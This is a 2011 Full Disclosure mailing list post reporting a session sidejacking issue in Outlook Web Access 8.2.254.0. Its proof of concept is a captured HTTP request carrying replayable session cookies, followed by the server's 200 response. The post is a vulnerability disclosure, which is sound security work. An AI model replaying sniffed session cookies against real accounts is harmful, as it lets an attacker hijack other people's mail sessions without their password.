Full Disclosure mailing list archives
Microsoft Outlook Web Access Session sidejacking/Session Replay Vulnerability
From: information security <informationhacker08 () gmail com>
Date: Tue, 25 Oct 2011 23:56:07 +0530
============================================================================== Microsoft Outlook Web Access Session sidejacking/Session Replay Vulnerability =============================================================================== by Asheesh Kumar Mani Tripathi # code by Asheesh kumar Mani Tripathi # email informationhacker08 () gmail com # Credit by Asheesh Anaconda #Date 25th Oct 2011 #Product Outlook Web Access 8.2.254.0 #Vulnerability SideJacking is the process of sniffing web cookies, then replaying them to clone another user's web session. Using a cloned web session, the jacker can exploit the victim's previously-established site access #Impact This allows attackers that can read the network traffic to intercept all the data that is submitted to the server or web pages viewed by the client. Since this data includes the session cookie, it allows him to impersonate the victim, even if the password itself is not compromised. #Proof of concept ======================================================================================================================== Request ======================================================================================================================== GET /owa/?ae=Folder&t=IPF.Note&a= HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-mfe-ipt, */* Referer: https://xxxwebmail.xxx.xxx/owa/ Accept-Language: en-in User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; FDM; .NET CLR 3.0.30729; .NET4.0C) Accept-Encoding: gzip, deflate Host: xxxwebmail.xxx.xxx Connection: Keep-Alive Cookie: sessionid=49307edc-0f26-4dae-95f8-02d3dc6ad8a3:000; cadata="25HxHgvnciGT/BOV1+yiA+HThFiE6kBtFXSjqAF0B5vvPAIKu7PA8tzKUCnW9N4Ao9E1WSzUeA27dLBgx"; UserContext=e8997d6036554ada88a62dc9f2cf65d3 ======================================================================================================================== Response ======================================================================================================================== HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 58676 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-OWA-Version: 8.2.254.0 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET Date: Tue, 25 Oct 2011 15:00:01 GMT #If you have any questions, comments, or concerns, feel free to contact me.
Attachment:
outlook_sidejacking.txt
Description:
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Microsoft Outlook Web Access Session sidejacking/Session Replay Vulnerability information security (Oct 25)
- Re: Microsoft Outlook Web Access Session sidejacking/Session Replay Vulnerability Darren McDonald (Oct 25)
- Re: Microsoft Outlook Web Access Session sidejacking/Session Replay Vulnerability William Reyor (Oct 25)
- Message not available
- Re: Microsoft Outlook Web Access Session sidejacking/Session Replay Vulnerability William Reyor (Oct 25)
- Re: Microsoft Outlook Web Access Session sidejacking/Session Replay Vulnerability Darren McDonald (Oct 25)
- Re: Microsoft Outlook Web Access Session sidejacking/Session Replay Vulnerability Darren McDonald (Oct 25)
- Message not available
- Re: Microsoft Outlook Web Access Session sidejacking/Session Replay Vulnerability William Reyor (Oct 26)
- Re: Microsoft Outlook Web Access Session sidejacking/Session Replay Vulnerability Darren McDonald (Oct 25)
- Re: Microsoft Outlook Web Access Session sidejacking/Session Replay Vulnerability information security (Oct 27)
- Re: Microsoft Outlook Web Access Session sidejacking/Session Replay Vulnerability William Reyor (Oct 25)
- Re: Microsoft Outlook Web Access Session sidejacking/Session Replay Vulnerability Darren McDonald (Oct 25)
- Re: Microsoft Outlook Web Access Session sidejacking/Session Replay Vulnerability Darren McDonald (Oct 25)